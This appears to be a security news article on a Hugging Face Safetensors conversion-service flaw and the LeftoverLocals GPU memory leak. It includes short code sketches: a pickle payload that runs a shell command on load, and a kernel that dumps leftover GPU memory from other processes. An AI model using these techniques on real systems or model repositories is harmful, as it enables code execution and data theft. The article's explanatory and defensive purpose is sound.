
New Hugging Face Vulnerability Exposes AI Models to Supply Chain Attacks

February 27, 2024 | Newsroom | Supply Chain Attack / Data Security

Cybersecurity researchers have found that it's possible to compromise the Hugging Face Safetensors conversion service to hijack models submitted by users and stage supply chain attacks.

In a report released last week, HiddenLayer said it is possible to send malicious pull requests from the Hugging Face service to any repository on the platform, as well as to hijack any models converted through the service.

This can be done using a hijacked model that is meant to be converted by the service, allowing malicious actors to request changes to any repository on the platform by posing as the conversion bot.

Hugging Face is a popular collaboration platform that lets users host pre-trained machine learning models and datasets, as well as build, train, and deploy them.

Safetensors is a <a href="https://huggingface.co/docs/safetensors/index" rel="noopener" target="_blank">format</a> the company created to store tensors with security in mind, as opposed to pickles, which threat actors have weaponized to execute arbitrary code and deploy Cobalt Strike, Mythic, and Metasploit stagers.
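To see why pickle is a risky model format, consider a minimal, self-contained Python sketch (illustrative only, not from HiddenLayer's report): unpickling can invoke any callable an attacker names via __reduce__, whereas a Safetensors file is parsed as plain data.

```python
import os
import pickle

# A pickle payload is a program, not just data: __reduce__ lets an object
# nominate any callable to run at load time.
class MaliciousPayload:
    def __reduce__(self):
        # A real attacker would launch a stager here; this harmless
        # command merely demonstrates code execution on load.
        return (os.system, ("echo code executed during unpickling",))

blob = pickle.dumps(MaliciousPayload())
pickle.loads(blob)  # simply loading the blob runs the attacker's command
```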


Additionally, the platform comes with a conversion service that lets users convert any pickle-based PyTorch model to its Safetensors equivalent via a pull request.
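For reference, here is a minimal sketch of what such a conversion involves, using the public torch and safetensors APIs (the file names are hypothetical):

```python
import torch
from safetensors.torch import save_file, load_file

# Load a pickle-based PyTorch checkpoint (hypothetical file name).
# Note: this step itself unpickles, which is exactly where the risk lies.
state_dict = torch.load("pytorch_model.bin", map_location="cpu")

# Write the tensors out as Safetensors: a code-free container of raw
# tensor bytes plus a JSON header.
save_file(state_dict, "model.safetensors")

# Loading the converted file parses only data and never executes code.
tensors = load_file("model.safetensors")
```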

According to HiddenLayer's analysis of this service, it's hypothetically possible for an attacker to hijack it with a malicious PyTorch binary and compromise the system hosting it.
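That hypothetical hinges on the fact that opening a pickle-based checkpoint is itself code execution. A small defensive sketch, assuming PyTorch 1.13 or later, restricts what the unpickler may construct:

```python
import torch

# torch.load unpickles by default, so a crafted checkpoint can execute
# arbitrary code the moment a conversion service opens it.
# weights_only=True limits unpickling to plain tensor/container types
# and raises an error on anything else. (File name is hypothetical.)
state_dict = torch.load("untrusted_model.bin",
                        map_location="cpu",
                        weights_only=True)
```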

Additionally, the token associated with SFConvertbot, the official bot that generates the conversion pull requests, could be used to send a malicious pull request to any repository on the site, creating a scenario in which a threat actor could tamper with a model and implant neural backdoors.
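One practical consequence is that a pull request appearing to come from SFConvertbot cannot be trusted on authorship alone. As a hedged sketch using the public huggingface_hub client (the repository id is hypothetical), repository owners can at least enumerate open pull requests for manual review:

```python
from huggingface_hub import HfApi

api = HfApi()

# List discussions and pull requests on a repository (repo id is
# hypothetical) so PRs claiming to come from the bot can be inspected.
for d in api.get_repo_discussions(repo_id="your-org/your-model"):
    if d.is_pull_request and d.status == "open":
        print(f"PR #{d.num} by {d.author}: {d.title}")
        # Authorship alone proves nothing once the bot's token leaks:
        # review the actual diff before merging.
```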

Eoin Wickens and Kasimir Schulz, the researchers who conducted the study, said that "any arbitrary code could be executed by an attacker whenever someone attempted to convert their model," and that models could be hijacked upon conversion without any indication to the user.

Should a user attempt to convert their own private repository, the attack could lead to the theft of their Hugging Face token, grant access to otherwise internal models and datasets, and even allow them to be poisoned.

Further complicating matters, an adversary could exploit the fact that any user can request the conversion of a public repository, opening the door to a significant supply chain risk.

Despite the best efforts to secure machine learning models in the Hugging Face ecosystem, the researchers said, the conversion service proved vulnerable and had the potential to enable a widespread supply chain attack via the official Hugging Face service.


"Any model that the service converted could be compromised by an attacker with a foothold in the container running the service," they added.

The development comes less than a month after Trail of Bits revealed LeftoverLocals (CVE-2023-4969, CVSS score: 6.5), a security vulnerability that allows the recovery of data from general-purpose graphics processing units (GPGPUs) made by Apple, Qualcomm, AMD, and Imagination.

The memory leak, caused by a failure to properly isolate process memory, lets a local attacker read memory from other processes, including another user's interactive session with a large language model (LLM).
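For context, the published proof of concept amounts to a "listener" kernel that dumps GPU local memory without writing to it first. A rough sketch of the idea in Python with pyopencl follows; on patched drivers the buffer reads back zeroed, and observing another process's data requires a vulnerable GPU:

```python
import numpy as np
import pyopencl as cl

# Listener kernel: reads GPU local memory without initializing it.
# On unpatched drivers it may contain residue from a previous kernel.
SRC = """
__kernel void dump_local(__local uint *lm, __global uint *out, uint n) {
    for (uint i = get_local_id(0); i < n; i += get_local_size(0))
        out[i] = lm[i];   // read uninitialized local memory
}
"""

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)
prog = cl.Program(ctx, SRC).build()

n = 4096  # words of local memory to dump (device-dependent limit)
out = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, n * 4)
prog.dump_local(queue, (64,), (64,), cl.LocalMemory(n * 4), out, np.uint32(n))

leaked = np.empty(n, dtype=np.uint32)
cl.enqueue_copy(queue, leaked, out)
print(leaked[:16])  # nonzero values may be another process's data
```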

"This data leaking can have severe security consequences, especially given the development of ML systems where local memory is used to store model inputs, outputs, and weights," security researchers Tyler Sorensen and Heidy Khlaaf said.

Found this article interesting? Follow us on LinkedIn and Twitter to read more of the exclusive content we post.